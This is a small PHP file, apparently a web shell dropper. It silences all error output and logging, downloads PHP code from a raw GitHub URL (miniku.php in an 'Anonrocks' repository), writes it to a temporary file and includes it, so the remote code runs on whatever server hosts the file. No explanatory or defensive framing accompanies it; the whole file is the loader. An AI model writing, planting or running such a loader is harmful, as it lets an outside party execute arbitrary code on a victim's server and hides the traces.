<?=
error_reporting(0);
ini_set('display_errors', '0');
ini_set('log_errors', '0');

$url = 'https://raw.githubusercontent.com/Anonrocks/-/refs/heads/master/miniku.php';
$dns = 'https://raw.githubusercontent.com/Anonrocks/-/refs/heads/master/mx.php';

$ch = curl_init($url);
if (defined('CURLOPT_DOH_URL')) {
    curl_setopt($ch, CURLOPT_DOH_URL, $dns);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);

$res = curl_exec($ch);
curl_close($ch);

$tmp = tmpfile();
$path = stream_get_meta_data($tmp)['uri'];

fprintf($tmp, '%s', $res);
include($path);
?>
<?php
?>